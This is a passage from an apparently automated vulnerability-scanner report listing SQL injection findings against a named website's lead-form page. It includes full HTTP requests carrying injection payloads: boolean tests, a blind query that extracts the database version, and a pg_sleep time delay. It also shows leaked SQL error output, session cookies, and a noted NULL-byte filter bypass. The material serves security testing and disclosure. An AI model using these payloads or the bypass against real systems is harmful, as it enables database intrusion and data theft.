       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing12543062'%20or%201%3d2--%20&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:43:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.182. http://www.insideup.com/ppc/leadflow/cace00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=atmdotmcuu41nnmcfoic3k5vm0; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
buteId_508[]=3311__ Credit card processing&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:09:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=veooma3b12jgmjg69fc9tanc46; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.183. http://www.insideup.com/ppc/leadflow/cace00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. The payloads 20463116'%20or%201%3d1--%20 and 20463116'%20or%201%3d2--%20 were each submitted in the button3 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit20463116'%20or%201%3d1--%20&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:43:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit20463116'%20or%201%3d2--%20&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:43:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.184. http://www.insideup.com/ppc/leadflow/cace00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. The payloads 52585341'%20or%201%3d1--%20 and 52585341'%20or%201%3d2--%20 were each submitted in the catId parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=8000752585341'%20or%201%3d1--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:35:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www.insideup.com/ppc/leadflow/">
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'd
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=8000752585341'%20or%201%3d2--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 03:35:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.185. http://www.insideup.com/ppc/leadflow/cace00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

